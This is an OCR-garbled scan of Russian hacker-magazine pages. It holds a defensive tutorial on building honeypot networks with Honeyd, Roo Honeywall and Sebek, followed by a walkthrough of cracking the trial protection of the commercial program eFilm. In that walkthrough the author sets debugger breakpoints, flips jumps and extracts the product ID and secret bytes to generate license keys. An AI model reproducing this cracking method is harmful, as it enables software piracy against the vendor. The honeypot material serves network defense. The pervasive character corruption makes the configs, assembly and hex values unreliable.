Не стоит отказываться от использования заіе тобе, достаточно следить 
за обновлениями РНР и своевременно ставить нужные патчи. Другим 
действенным методом является внедрение сторонних разработок, таких 
как зи РНР, разграничивающих использование скриптов в зависимости от 
выставленных прав, либо установка РНРзаіетобе.раІюЬ, принцип работы 
которого мало отличается от предыдущего варианта. 

^ ЕОР 

Как видно, существует множество функций и плагинов с уязвимостя- 
ми, которым авторы веб-скриптов не придают значения либо просто 
не догадываются о возможности эксплуатации брешей в их скриптах, 
да и разработчики РНР не с особой охотой выпускают патчи для сво- 
его продукта. 

Наше дело облегчает Ооодіе Собе 5еагсЬ, позволяющий искать вызы- 
ваемые функций по базе, содержащей в себе разнообразные пакеты 
разработки. т 
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ХИЩНИКА 



АЩИТА СЕТИ ОТ ВНЕШНИХ ВТОРЖЕНИИ 



ЛОВУШКА 



Сколько способов защиты локальных се- 
тей от внешних вторжений ты знаешь? 

Два? Три? Пять? Сегодня ты узнаешь еще 
один. Думаешь, я расскажу о новом способе 
строительства стен (читай: файрволов) и 
прочих фортификационных сооружений 
(читай: Ю5 или ІРЗ)? Нет, мы будем рыть 
ямы и тщательно маскировать их. Да так, 
что хакер, попав в одну из них, поймет это 
далеко не сразу. Речь пойдет о системах-ло- 
вушках, а именно о ЬопеуроС 



ВЗЛОМ 



опеуроі — программное средство, суть которого заключается 
в том, что оно должно привлекать хакеров и быть легко взла- 
мываемым. Будучи взломанным, ЬопеуроІ способен сообщить 
о том, как взлом был осуществлен. 

По своему устройству Ьопеуроі предполагает пассивное существование 
в надежде на то, что хакер по неосторожности зайдет и на него. Тогда 
сработавший сенсор сообщито проникновении. Но если хакер на него не 
зайдет, то так и останется незамеченным (если, разумеется, не сработают 
другие механизмы защиты]. Поэтому сегодня мы задействуем ловушку 
несколько по-другому — мы приведем в нее хакера. Как мы узнаем, хакер 
это или нет? В нашей сети нет серверов, доступных из интернета. Все они 
либо вынесены в 0М2, либо находятся на хостинг-площадках. Внутренние 
серверы обслуживают только внутренние запросы. Поумолчанию все, кто 
пытается проникнуть на файрвол из интернета, — хакеры. Ахакеры идут 
лесом. Точнее, в ловушку. 

г ЕЩЕ ПАРУ СЛОВ О НОЫЕѴРОТ 

Системы бопеуроі бывают двух видов: низкоинтерактивные и 
высокоинтерактивные. 



Низкоинтерактивные бопеуроС как правило, представляют собой 
программу, реализующую один или несколько сетевых сервисов, 
предназначенных для взлома, разумеется. Такими сервисами могут 
быть РТР, НТТР, 5МТР, Му5СН_, 0Ы5 и множество других. Например, 
Нопеуроі КРБепзог имеет на борту около 60 различных сервисов. 
Сервисы относятся к разным категориям: «Веб-сервер», «Рабочая 
станция М5 ѴѴіпсіоѵѵб», «Сервер І_іпих», «Сервер М5 ѴѴіпсІоѵѵз» и т.д. 
Также в качестве бонуса для хакера в этой программе (да и во многих 
остальных) содержатся эмуляции троянских бэкдоров. Но это только 
для того, чтобы при влечь его внимание. Основное назначение низ ко- 
интерактивного бопеуроі — вовремя узнать о совершении атаки. Для 
сбора информации о хакере, его инструментах и особенностях взлома 
он чаще всего не годится. Зато он прекрасно подходит для отвлечения 
внимания хакера и отнимания у него времени. Просканировав такую 
приманку сканером уязвимостей, хакер с удовольствием обнаружит 
одну или несколько (сколько ты пожелаешь] дырок, которыми ему 
наверняка захочется воспользоваться. 

Такжеу нас будет использоваться НопеуО. НопеуО (и его портѴѴіпНопеуО) 
— это специализированная платформа для построения ловушек. Она 
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Директивой сгеаіе задается название машины, 
например ѴѴіпХР, Сізсо, Поиіег. Опцией сМаиІб 
описываются все прочие машины, 
зеі $название_хоста регзопаіііу "$Ріпдегргіп{" 

— сетевой отпечаток какой-либо операционной 
системы из файла птар.ргіпіз. 
зеі $название_хоста сІе^аиН $транспортный_про- 
токол асбоп $действие (гезеі: или б гор) — дей- 
ствие, осуществляемое при присоединении на 
неуказанные порты. 

абб $название_хоста Іср (или ибр) рогі $но- 
мер_порта "действие" — правило или скрипт, 
запускаемый при подключении куказанному 
порту указа иного адреса. 

Ьіпб $ІР_абгезз $название_хоста — привязка 
конкретного ІР-адреса к настроенной ловушке. 
Как видишь, все директивы интуитивно понятны, и 
собрать небольшую сеть можно за короткое время. 



Главное окно настроек КРЗепзогс логом событий 



Пример размещения ловушек НопеуРоІ в корпоративной сети 



## Нопеуб сопбідигабіоп бііе ## 

### Создаем ловушку, работающую как Міпбомз Зегѵег 
сгеабе бебаиіб 

зеб бебаиіб регзопаіібу "Міпбомз ЫТ 4.0 Зегѵег ЗР5-8Р6 
зеб бебаиіб бебаиіб бср асбіоп гезеб 
абб бебаиіб бср рогб 110 "зЬ зсгірбз/рор . зЬ" 
абб бебаиіб бср рогб 80 "регі зсгірбз/ііз-0 . 95/шаіп. 
рі" 

абб бебаиіб бср рогб 25 Ыоск 
абб бебаиіб бср рогб 21 "зЬ зсгірбз/ббр . зЬ" 
абб бебаиіб бср рогб 22 ргоху $ірзгс:22 
абб бебаиіб ибр рогб 139 бгор 
зеб бебаиіб ирбіше 3284460 



### Ловушка, работающая как маршрутизатор Сізсо 
сгеабе гоибег 

зеб гоибег регзопаіібу "Сізсо 4500-М гиппіпд 103 11.3 (6) 
ІР Ріиз " 

абб гоибег бср рогб 23 " /изг/Ьіп/регІ зсгірбз/гоибег- 
беіпеб .рі " 

зеб гоибег бебаиіб бср асбіоп гезеб 

зеб гоибег иіб 32767 діб 32767 
зеб гоибег ирбіше 1327650 



#3адаем привязку ІР-адреса к конкрет- 
ной ловушке 

Ьіпб 192 .168.1.150 гоибег 



Пример формирования сети ловушек параллельно рабочей 



работает по модульному принципу. Каждый сервис — отдельный скрипт, 
определяющий поведение ловушки и реализующий механизм «запрос- 
ответ». Зная, как устроен тот или иной сервис (можно заглянуть в РРС), и 
обладая навыками программирования, ты сможешь сделать такой сервис- 
ловушку сам. Крометого, Нопеуй имеет расширенные средства формиро- 
вания виртуальных сетей, в которых рольузлов выполняютсконфигуриро- 
ванные ловушки. Довольно интересно то, как можно сделать эту сеть более 
реалистичной. Например, можно ввести коэффициент потери пакетов на 
линии, время задержки отклика, добавить недостижимые сети и т.д. Таким 
образом, например, лог ріпд будетболее реалистичным. Нопеуй позволяет 
запустить 65536 ловушек, которые работают как отдельные машины и, по 
сути, представляют собой сенсоры, реагирующие на проникновениехакера. 
Другой особенностью этого Ьопеуроі является возможность осуществления 
подмены отпечатка сетевого стека (пеіѵѵогк бпдегргіпі:). Причем эти самые 
отпечатки берутся отсамих программ сканирования сетей, таких как ЫМар 
или ХргоЬе. Тем самым можно достаточно реалистично реализовать сеть 
сложной топологии с различным оборудованием, таким как компьютеры 
на базе ѴѴіпбоѵѵз, біпих, *В50, маршрутизаторы Сізсо и т.д. Посидев один 
вечер над файлом конфигурации, можно реализовать системы с сотнями 
машин, десятками маршрутизаторов и серверов. 

Простой конфигурационный файл Нопеуй может выглядеть так: 
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Базовая модель работы ловушек 
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Пример формирования сети ловушек параллельно рабочей сети 



^ ВЫСОКОИНТЕРАКТИВНАЯ ЛОВУШКА 

Высокоинтерактивный Ьопеуроі работаетпо совершенно иному принци- 
пу: ничего не эмулируется. В качестве приманки используется обычный 
компьютер с обычной операционной системой. Но для того чтобы можно 
было наблюдать за действиями хакера, устанавливается специальный 
программный модуль. Этот модуль скрыт в системе и по принципу работы 
ничем не отличается от руткита ядра. В его задачи входит протоколирова- 
ние системных событий на низком уровне. 

Говорить мы будем о системе Тбе НопеуЫеІ Ргс^'есГ Именно о ней хотя бы 
потому, что других нет. Разработчики из ТЬе НопеуЫеІ Ргоіесі: предложили 
свою концепцию построения ловушек. Так как изначально предполагалось, 
что будут разворачиваться сети ловушек, которые могут включать в себя 
десятки, а то и сотни машин, то для удобства управления и сбора инфор- 
мации такая система должна быть централизованной. Система состоит 
из модуля ЭеЬек, устанавливаемого на компьютер-ловушку, и выделен- 
ного компьютера с ОС Роо НопеуѴѴаІІ (от слов Нопеуроі РігеѴѴаЩ, который 
осуществляет сбор информации со всех сенсоров, отслеживает сетевые 
соединения и может ограничивать действия хакера при совершении атаки. 
Роо НопеуѴѴаІІ работает в режиме моста, то есть соединяет сегменты сети, 
но для узлов в этих сегментах он незаметен. Таким образом, он представ- 
ляетсобой «прозрачный» файрвол, работающий на канальном уровне. Ты 
тоже о таком не слышал? :] В простейшем виде такая связка работаеттак, 
как показано на схеме «Базовая модель работы ловушек». 

Так как Роо НопеуѴѴаІІ прозрачен для сетевых соединений, он прозрачен и для 
любых подключений ксебе. Оба его сетевых интерфейса даже не имеют ІР- 
адресов. Для того чтобы кнему можно былоудаленно подключиться, необходим 
третий сетевой интерфейс, подключенный к третьему сетевому сегмент/. В 
принципе, третьего сетевого сегмента можно и избежать, прописав маршрути- 
зацию или сделав его виртуальным а-ля НатасЫ (он, кстати, поддерживается]. 
Но появление чужеродного трафика в этом сегменте может натолкнуть хакера на 
подозрения. Управление будет производиться либо по 55І_ из браузера, либо по 
55Н. Какая ОС будет стоять на станции управления — решать тебе. 

Теперь поговорим о новом способе защиты сети от внешних вторжений, 
который упоминался в начале статьи. 

Общая концепция построения такой защиты заключается втом, чтобы 
параллельно обыкновенной производственной сети сформировать сеть- 

Таблица правил брандмауэра на внешнем маршрутизаторе 



ловушку. Производственной может быть любая сеть: корпоративная, твоей 
кафедры или факультета, домашняя сеть. А может — вообще один компью- 
тер, на случай если ты хочешь использовать ловушку в исследовательских 
целях или просто поиздеваться над хакерами. 

^ КАК ЭТО ВСЕ РАБОТАЕТ 

Какты видишь, на схеме представлено 3 сети, соединенных маршру- 
тизатором: интернет, сеть-ловушка и производственная сеть. Как 
устроены интернет и твоя производственная сеть рассказывать не 
стану. Устройство сети-ловушки должно быть похожим на устройство 
производственной сети, нов целом остается на твое усмотрение. 
Главное, чтобы в ней присутствовал файрвол, рабочие станции и 
какие-нибудь серверы. Разумеется, фейковые. Одним из вариантов 
создания сети-ловушки будет дублирование ключевых компьютеров 
производственной сети, а именно самого файрвола, сервера и эта- 
лонных рабочих станций. Это будет полезно из следующих сообра- 
жений. Хакер атакует подставной файрвол. Через какое-то время он 
проникает на него и, следовательно, в локальную сеть. После этого 
он производит сканирование сети и атакует какие-либо машины. 
Если этими машинами будут аналоги существующих машин, то тебе 
станет ясно, каким образом хакер смог бы проникнуть в реальную 
сеть и обеспечить себе доступ к отдельным узлам сети. Тут как раз 
и появится повод призадуматься об инфраструктуре безопасности 
твоей сети. 

Отдельно на твое усмотрение остаются следующие вопросы: сделать ли 
специально файрвол и машины бажными или использовать точные копии 
реальных машин. У каждого подхода есть свои преимущества и недостатки. 
Разумеется, на самих машинах сети-ловушки должны храниться фейковые 
данные. 

Ключевым моментом работы такой сети является наличие граничного мар- 
шрутизатора. В его задачи входиттрансляция всех пакетов из интернета в 
сеть-ловушку и обратно и возможность доступа пользователей из локаль- 
ной сети в интернет. Эти задачи будут решаться с помощью механизмов 
ЫАТ и РОРТ МАРРІЫ6. На граничном маршрутизаторе создается несколько 
правил. В общем виде они могут вы глядеть та к, как показано втаблице 
Для того чтобы хакер не стал использовать твою сеть в корыстных 



Источник 


Назначение 


Сервисы 


Действие 


Трансляция 


Комментарий 


Интернет 


НоитЕн 


Ап 


Аыоѵѵ 


Рорт Марріисз в Раке і_АЫ (на 

ПОДСТАВНОЙ ФАЙРВОЛЛ) 


Все пакеты из интернета транслируются в сеть-ловушку (основ- 
ное правило) 


Раке ЦМ 


Интернет 


Аи_ 


Аі_і_о\л/ 


ЫАТІІнет-інтеврасе) 


Разрешен исходящий трафик в интернет из сети-ловушки 


Сокр ЦМ 


Интернет 


Ап 


Аішоѵѵ 


МАТІІнет-іитеррасе) 


Разрешен исходящий трафик в интернет из сети-ловушки 


Раке ЦМ 


Сорр САИ 


Ап 


йРОР 


- 


Взаимодействие между сетями запрещено 


Сорр им 


Сорр САИ 


Ап 


Рвор 


- 


Взаимодействие между сетями запрещено 



Согр БАМ — корпоративная сеть 
Раке І_АИ — сеть ловушек 

Іпеі-Іпіегіасе — внешний ІР-адрес маршрутизатора 
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Статистика сетевой активности по разным НопеуѴѴаІІ 



>> 



Сети ханипотов — это большое палево 
для хакеров. Подставные компьютеры 
анализируют спам, атаки на серверы 
и остальную темную активность. Так 
палятся новые трояны, сплоиты и 
уязвимости. Можно сразу вспомнить 
нашумевший ѴѴМР-баг, который опа- 
лился в ханипот-сети антивирусной 
компании Р-5есиге. 





Да уж, палево — не то слово. Ріо я 
к этому отношусь философски :). 



целях, а именно для ООоЗ'а, спама, проведения атак на другие серверы 
интернета и прочих гадостей, ты можешь еще немного поколдовать над 
правилами брандмауэра и обеспечить более высокий уровень защиты. 

Ріо здесь необходимо балансировать на грани разумного и безопасного. 
Слишком жесткие ограничения дадутхакеру возможность понять, что 
он попал в контролируемую ловушку, а отсутствие ограничений сможет 
превратить твою сеть в ботнет или площадку для атак, особенно если ты 
долгое время не будешь следить за ловушкой. 

^ ОСОБЕННОСТИ ВНЕДРЕНИЯ 

РІаверное, ты уже успел подумать отом, сколько машин можетпотребо- 
ваться для такой затеи. Штук 5-1 0? Можно итак. А можно проще и гораздо 
дешевле. 

Когда-то кто-то, наверное, оченьумный, придумал, как на одном компью- 
тере запустить несколько операционных систем. Одновременно. Да, речь 
пойдет о технологиях виртуализации. Причем именно отехнологиях, а не о 
конечных продуктах. Такихтехнологий я насчитал 4 штуки. 

Для нас наиболее интересными будут две технологии виртуализации, а имен- 



Пример размещения ловушек Ьопеуроі в корпоративной сети 




Пользовательский I НопеуРоІ I Пользовательский I Пользовательский I НопеуРоІ 

компьютер I «Пользовательский I компьютер I компьютер I «Пользовательский 

компьютер» компьютер» 



но гипервизорная виртуализация, работающая поверхжелеза, и виртуали- 
зация на уровне ОС. Наиболее известными продуктами, работающими по 
первой технологии, являются ХЕМ и ѴМѵѵаге Е5Х. Ко второму типу относятся 
М5 Ѵігіиаі РС (а также Зегѵег) и ѴМѵѵаге ѴѴогквІабоп (а также 65Х, Зегѵегит.д.). 
Так как именно ѴМѵѵаге ѴѴогк5Іа1:іоп получила наиболее широкое рас- 
пространение, то и систему мы будем поднимать на ней. В наши задачи 
входит создание сети виртуальных машин, работающих как приманки, 
файрвола- при манки, трансляции всего внешнего трафика на подстав- 
ной файрвол через Роо НопеуѴѴаІІ, решение проблем, связанных с мар- 
шрутизацией трафика между сетевыми сегментами, и прочие мелочи. 
Попробуем развернуть всю сеть-приманку на твоем файрволе. Он должен 
иметь достаточное количество памяти и шустрый процессор. В качестве 
маршрутизатора используем последнюю версию Кегіо ѴѴіпНоиІе РігеѴѴаІІ 
(КѴѴВР). Базовые правила для файрвола будут таки ми же, какте, что указаны 
в таблице. 

В качестве гипервизора виртуальных машин используем ѴМѵѵаге 
ѴѴогквІаІіоп 5.5. Отключаем ее встроенные сервисы ЫАТ и йНСР. Сде- 
лать это можно либо через зегѵісев.твс, либо через настройки самой 
Вары. Создаем 6 виртуальных машин. Устанавливаем Роо НопеуѴѴаІІ. 
Для этого скачиваем дистрибутив с сайта ѵѵѵѵѵѵ.бопеупеЕогд или берем 
его с йѴО-диска. Подключаем 150-образ или прожигаем болванку. 
Запускаем машину и производим установку. Установка полностью авто- 
матическая, поэтому проблем возникнуть не должно. Первый интерфейс 
(еШО) заводим в сетевой сегмент, который виден на физическом ком- 
пьютере. В данном случае это ѴМЫеІ 4. Далее устанавливаем какую- 
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> СІѴСІ 

На нашем йѴй 
ты найдешь все 
программы, которые 
были использованы 
в процессе работы, 
дистрибутив Ноо 
НопеуѴѴаІІ и схемы 
в высоком 
разрешении. 






ТИе Нопеѵпеі і1Гі , ѵѵ- . : 




Логвзаимодействия взломщика с ловушкой 



нибудь ОС и делаем из нее файрвол. Внешний ІР-адрес 
этого файрвола будет 1 92.1 68.1 30.2. Обрати внимание, что 
именно на него будет производиться полная трансляция 
всех пакетов, приходящих из интернета, с помощью КѴѴНР. 
Для того чтобы транслированные в сеть ѴМЫеІ 4 пакеты 
смогли достигнуть файрвола, находящегося в сети ѴМЫеІ: 7, 
маски подсети на интерфейсе физической машины и фей- 
кового файрвола должны быть установлены в 255.255.0.0. 
Объединяем второй сетевой интерфейс Воо НопеуѴѴаІІ 
(еібі ] и новоиспеченный файрвол. В данном случае это 
ѴМЫеІ 7. Вторым сетевым интерфейсом наш фейковый 
файрволл будет находиться в сетевом сегменте ѴМЫеІ 
1 . Именно сегмент ѴМЫеІ 1 будет сетью твоих ловушек. 

В этой сети устанавливается несколько высокоинтерак- 
тивных ловушек, например ѴѴіпсІоѵѵз ХР + модуль ЗеЬек 
в качестве пользовательского компьютера и несколько 
других серверов, тоже в связке с модулями ЗеЬек, и 
один низкоинтерактивный бопеурор например Нопеуй. 
Нопеуй поможет организовать массовку с использова- 
нием минимальных ресурсозатрат. Как я уже говорил, в 
этой виртуальной сети желательно сделать некое подобие 
твоей реальной сети. 

^ УПРАВЛЕНИЕ ЛОВУШКАМИ 

Управлять Роо НопеуѴѴаІІ можно несколькими спосо- 
бами. Самый простой и одновременно самый сложный 

— управлять локально. Простой — потому что никаких 
дополнительных телодвижений не требуется. Сложный 

— потому что конфигурировать систему и осуществлять 
мониторинг, используя одну консоль, способны лишь от- 
дел ьные аксакалы. Система предусматривает удаленное 
администрирование в ѴѴеЬ-ЬавесІ 6111. Можно поставить 
рядом еще одну виртуальную машинку и завести ее и 
интерфейс еІб2 Роо НопеуѴѴаІІ в один сетевой сегмент, 
например ѴМЫеІ 9. Можно обойтись и без виртуальной 
машины: вывести этот самый ѴМЫеІ 9 наружу, то есть на 
физическую машину, и управлять с нее. А можно и еще 
хитрее: перевести только что выведенный наружу ѴМЫеІ; 
9 в режим Вгібдіпд с физической сетевой картой І_АЫ 
Іпіег^асе и управлять со своего компьютера, находя- 
щегося в локальной сети. Для этого придется немного 
повозиться с табл ицей маршрутизации, но если ты не 
пропускал лекции по сетям, то сделаешь это за 5 минут. 
Послетого как вся сеть собрана, щедро награждай багами от- 
дельные фейковые машины, чтобы привлечь к ним внимание 
хакера. Для уверенности ты можешь разместить несколько 




Просмотр события атаки: перебор пароля на М550І_-сервер 



бопеуроГов в производственной сети. Это позволит узнать о 
неприятеле, в случае если он попал в сеть другим образом. 

^ ПОСЛЕ АТАКИ 

Какузнать, была ли совершена атака или нет? Каждое 
бопеуроі-средство предлагает для этого свои инструменты. 
Для одних бопеуроі’ов более важным является сам факт 
обнаружения атаки, в то время как для других — все детали ее 
совершения. Например, Нопеуроі КРЗепзог может рассказать 
отом, с какихузлов было произведено подключение, какие 
сервисы задействовались, какие пароли использовались при 
переборе ит.д. Высокоинтерактивные ловушки с модуля- 
ми ЗеЬек через свой сервер на Воо НопеуѴѴаІІ дают более 
подробную информацию, а именно какие процессы запускал 
взломщик на ловушке, какие процессы модифицировал, 
совершая атаку, и т.д. Благодаря тому что данные с десятков 
машин собираются на одном Ноо НопеуѴѴаІІ, можно опера- 
тивно наблюдать за тем, что там творится. Как происходит 
само оповещение об атаке, тоже зависит от самого бопеуроГа. 
В одних при атаке отправляется письмо на почтовый ящик 
администратора, в других — сообщение ІСО или других ІМ. 
Несложно реализовать отправление зтз-сообщения на 
телефон админа. Отдельные представители умеют пищать 
системным динамиком и обращать на себя внимание другими 
замысловатыми способами. 

0 И ЭТО ЕЩЕ НЕ КОНЕЦ! 

Процесс заманивания хакера в ловушку похож на рыбалку. 
Насадил наживку, забросил поплавок в камыши и сидишь 
— ждешь большую рыбу. Колебания поплавка на воде 
дадут понять, с какой рыбой ты будешь иметь дело. Навер- 
няка, будет попадаться и всякая мелочевка. Значит, пора 
сменить наживку (усилить защиту подставного файрвола 
и т.д.). Конечно, это целая наука. Но знание особенностей 
работы и понимание ее фундаментальных принципов 
позволит экспериментировать и создавать интересные 
системы. Но, как бы там ни было, приятное (а я бы сказал, и 
полезное) времяпрепровождение тебе обеспечено, □с 
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Во многих программах есть ошиб- 
ки. Ошибки бывают разные. К при- 
меру, то, что программа по каким- 
то причинам работает только 
30 дней, я считаю ошибкой :). 
Ошибки надо исправлять. И тут на 
помощь нам приходят отладчик с 
дизассемблером. Две милые девуш- 
ки — Оля (ОПуБЬ^) и Ида (ГОА). 



о долгу службы одному моему знакомому потребовалось 
использовать узкоспециализированную и дорогостоящую 
программу еРіІт от Мегде еМеб. Денег на ее покупку нет. Сама 
же программа необходима исключительно в целях отладки; 
являясь клиентом, она помогает отлаживать собственноручно написанный 
сервер. 30 дней, что дается на пробу, для этого явно не хватит. Узкоспециа- 
лизированное^ стала гарантом отсутствия широко известных методов 
увеличения срока службы. А значит, пора доставать мой большой отладчик! 

В АНАЛИЗ 

Не думаю, что установка программы может вызвать хоть какие-то затруд- 
нения. Собственно, пока все достойно работает. Но вот первый запуск, 
и насуведомляютотом, что программу можно или попробовать, или 
зарегистрировать. Выбираем первое. Получаем предупреждение, что 
системное время менять не стоит. Замечательно. В пункте меню «Неір 
-> Ысепзіпд...» видим запутанную систему лицензий. Похоже, что где-то 
здесь и находится та самая ошибка, которую надо исправить. 

Для начала попробуем найти следы защиты в виде пакеров и протекто- 
ров. В папке с программой РеЮ обнаруживает целый букет разнообраз- 
ных компиляторов, но ни один модуль ничем не упакован. В том числе и 
основной. А это отличный повод запустить Иду и Олю. Пока первая из них 



занята анализом, мы с помощью второй попытаемся локализовать кусок 
кода, отвечающий за лицензии. 

Запускаем еРіІт из под Оли. При запуске в программе происходят исклю- 
чения, с которыми она сама не справляется. Значит, придется понажи- 
мать <5Ы1Т-Р9>. После полной загрузки заходим в «Неір -> Ысепзіпд...» и 
делаем вид, будто все уже оплачено. РІажимаем І_осаІ. РІам дают какой-то 
Реіегепсе Кеу (запишем куда-нибудь!) и предлагают ввести Ысепзе Кеу. 
Ну что же. Вводим классическое «111111111 ...» (сколько хочется еди- 
ничек) и смеложмем ОК. Программа ругается МеззадеВох’ом. Ставим 
брейкпоинт на МеззадеВох в Оле (Ьр МеззадеВохѴѴ и Ьр МеззадеВохА). 
Давим О К — наш брейкпоинт срабатывает. 

Мыв кегпе132, и теперь нам надо попасть к месту вызова этой стан- 
дартной процедуры. Просто трассируем программу до геіп’а. Ага. Мы 
теперь мы в МРС. Трассируем до следующего геіп’а. Опа. Мы в еРіІт. ехе. 
Поднимаем взор чуть выше только что выполненного саІГа, и пытаемся 
понять, как же программа до него дошла. Иногда изменив парулогичес- 
кихусловий, можно добиться совсем других последствий. 

Найдем начало процедуры, в которой мы находимся. Оно выдаетсебя 
прологом и характерными выравниваниями. Ставим брейкпоинт на 
найденное начало и вдумчиво наблюдаем за происходящим на мони- 
торе. Очевидно, что в этой процедуре находятся проверки только что 




► 072 



ХАКЕР 10 /106/ 07 




■-Сі р*-?-*--**' Ьн я Грі -- «4*1 -1 чМя Ьчт* I*. 

Г ли *^еіКиг ■ Ь.гсгкг.. і*-п*<чЛ»й Игда 
?іч,-і»и|іі*И»*:, 

чтимая 

ВД№Ч*Ѵір «И 

Ь іы Гі | і ц . * ->ѵ. 




т%ь-. гі..паі-*лп> Ѵ^Ьпз- і^ѣ. «іи и ,.* 



к иь, К> ^ і^кти т» ■ игі 

чЬйиі -л 'ыіш'.аігк. іЧѴ к,- -.- 






Воттакой вотласковый прием 



■ : ‘ ВЗЛОМ 



7Е45Ѳ&Р0 

7Е45Ѳ6РЕ 

7Е4506РР 

7Е4Б0700 

7Е4Б0701 


90 

90 

90 

90 

90 


ГНОР 

МОР 

МОР 

МОР 

МОР 


■■■■ 8ВРР 


N00 ЕОІ.ЕОІ 


7Е4Б07Ѳ4 


55 


РІІ5Н ЕВР 


7Е450705 


8ВЕС 


N00 ЕВР.Е8Р 


7Е4БѲ707 


8330 ВС14477Е 0 


СМР 0Ы0Р0 РТР 03: [7Е4714ВСЛ0 


7Е4Б07ѲЕ 


ѵ74 24 


0Е 5Н0РТ 113ЕВ32. 7Е450734 


7Е45Ѳ710 


64: Р1 18000000 


N00 ЕРХ, ОІлІОРО РТР РЗ: С 183 


7Е450716 


6Й 00 


РІІЗН 0 


7 Е450718 


РР70 24 


РІІ8Н 0Ы0Р0 РТР 03: СЕРХ+24] 


7Е45071В 


68 241В477Е 


РЧЗН 113ЕР32. 7Е471В24 


7Е450720 


РР15 С412417Е 


ери. оиюро РТР ОЗ: [С&КЕРМЕІ-Зг. ІпТегІоск 


7Е4БѲ726 


85С0 


ТЕЗТ ЕРХ, ЕРХ 


7Е45Ѳ728 


ѵ75 0Р 


ОМЕ ЗНОРТ 113ЕР32. 7Е450734 


7Е4Б072Н 


С705 201В477Е 0 


N00 ОЫОРО РТР 03: С7Е471В20], 1 


7Е4БѲ734 


6Р 00 


РІІЗН 0 


7Е450736 


РР75 14 


РІІЗН ОІІЮРО РТР 33: СЕВР+14] 


7Е4БѲ739 


РР75 10 


РІІЗН ОІ.І.ІОРО РТР 33: СЕВР+10] 


7Е4Б073С 


РР75 0С 


РІІЗН ОЫОРО РТР 33: СЕВР+С] 


7Е4Б073Р 


РР75 08 


Р03Н ОІ.І.ЮРО РТР 53: СЕВР+8] 


7Е4БѲ742 


Е8 20000000 


СРЬЕ 113ЕР32 . Ие5*адеВон Ен Й 


7Е450747 


50 


РОР ЕВР 


7Е45Ѳ743 


С2 1000 


РЕТМ 10 


7СГИСА7ЛО 


о а 


МП О 



Наш брейкпоинтсработал 



введенной строки. Причем в ответ на всякую некорректность мы прыгаем 
в блоке вызовом МеввадеВох'а. Хм.тутесть два варианта: либо мы ме- 
няем строку, добиваясь, чтоб некорректностей не было, либо мы меняем 
логические переходы на противоположные. В первом случае мы узнаем, 
как примерно должен выглядеть номер лицензии, во втором же мы 
рискуем довольно скоро добраться до ядра защиты. Сейчас я хочу быстро 
найти что-нибудь любопытное, поэтому мой вариант номер два. Если не 
получится, проведем тотальный разбор. 

Избегая блока с руганью, меняя флаги процессора перед ітр’ами, 
трассируем программу дальше. Стандартные процедуры трассировать 
бессмысленно, поэтому перешагиваем через многочисленные вызовы из 
глію, кегпе132 и изег32. А вот местные процедуры могут быть интересны, 
поэтому их мы трассируем с заходом. Оля показывает нам содержимое 
стека и регистров. И там мелькает имя нашей программы, интересный 
ключ в реестре и какой-то номер. По вызываемым функциям становит- 
ся примерно ясно, что происходит (к слову, человеческие имена для 
тіе-процедур можно получитьу Иды). Запоминая действия программы, 
и записывая данные на листочке, продолжаем дальше. Доходим до любо- 
пытного места, а именно вызова: 

004РАВВЗ САЬІі ШОКБ РТК Б5 : [ЕАХ+14] 

; <СГМР . &ебЗІіегі^ЕЬоса1 . ?Се1:Ьісеп5еНапс11е@ 

СЗЬ.егіббЬоса1@@ІІАЕКХ2 > , 

В нем Оля углядела функцию из библиотеки еІ5ЬегНЛ_осаІ. Функция име- 
ет, прямо скажем, заманчивое имя. В папке с программой как раз лежит 
такая библиотека. И еще там есть библиотека с довольно похожим име- 
нем: еІБЬегіІІРетоІе. Судя по всему, это разные части одного защитного 
механизма. Первая библиотека — для локального применения, а вторая 
— на случай, если у нас есть сеть и лицензии надо шарить. Но это только 
догадки, которые, однако, подтверждаются наличием кнопок І_осаІ, СІіепІ 
и Зегѵег в диалоге регистрации. Просим Иду дизассемблировать и их. Это 
происходит довольно быстро. И начиная анализ, обращаем внимание на 
странный факт, что имена многих функций втаблицах экспорта и импорта 
совпадают. Более того, импорт происходит из библиотеки 5І5І_осаІ. 
сіЩвІІРетоІе.сІІІ.), и если еІЭНегіІЛ-ОсаІ написана на С++, то 5І5І_осаІ — на 
С. Таким образом, библиотеки еІБЬегіІІ* — объектные надстройки над 
библиотеками 5І5*. Жуть. 

г ПОИСК 

Что мы имеем? Защита организована в виде библиотек. Библиотеки 
имеютунифицированный интерфейс. В голову начинаютлезть разные 
мысли: 

1 ) выяснив правильные ответы на запросы большого брата, можно было 
бы подменить библиотеки; 

2) защита явно не самодельная, а значит, где-то есть документация. 



Опробуем вторую мысль. Гуглим по слову візіосаі. Первая же ссылка ведет 
нас на сайт со звучным именем БЬегіІІ-зоІІѵѵаге.сот . Более того, она 
ведет нас прямо в Ьеір для тех, кто решил использовать эту защиту! Вот 
везение! 

За комплектзащиты для одной программы с нас просят всего $550 и 
$275 за каждую следующую. Эх... хорошо, что можно просто попробовать. 
Качаем 5БК, щелкнув по кнопке Ргее еѵаіиаііоп (форму можно заполнять 
кривыми данными). 

Честно говоря, на этом поиски можно было бы и закончить ввиду того, 
что в беір’е достаточно подробно изложен принцип работы библиотеки, 
что позволяет бы без труда написать подмену. Но мой взгляд приковала 
папка Т00І_5. В ней лежатутилиты для работы с лицензиями. ЗІзАсІтіп 

— явно утилита для манипулирования существующими лицензиями. 
ЗІзОеп — утилита для генерации лицензий по известным Ргосіисі ІЧате, 
Ргосіисі Ю, Ргосіисі БесгеІБ. Первое — тупо имя программы. Ргосіисі Ю 

— это 5 групп по 4 цифры. Группы разделены дефисами. Ргосіисі ВесгеІБ 

— 4 строки, в каждой строке 4 группы по 4 цифры. Дальше в эту программу 
кидается Реіегепсе Кеу, и мы получаем Бісепсе Кеу. Реіегепсе Кеу, по- 
видимому, индивидуален для каждой машины. И его нам выдали еще в 
самом начале. 

Одна незадача — у нас нет ни Ргосіисі Ю, ни Ргосіисі Зесгеіз. Открываем 
мануал. Так. Ргосіисі Ю узнать просто — он в открытом виде передается 
многим процедурам (5І_5_РедиеБІ, например). Да и в реестре он светится, 
не говоря уже отом, что наша программа покажетего, если нажать кнопку 
Ѵіеѵѵ в меню «Неір -> Ысепзіпд...». Вотон: 5366-8721-2229-7642-571 1 . 

С Ргосіисі Зесгеіз все сложнее. Они бывают двух типов: обычные и зашиф- 
рованные. Эти ключи участвуют в проверке лицензий, поэтому они тоже 
передаются в одну из процедур. Но передаются они в зашифрованном 
виде, а для генератора они нам нужны в обычном. Собственно, вотони: 

0x42 0x62 0x17 0x00 0x43 ОхРС 0хС0 0х7Р 0х8Р 

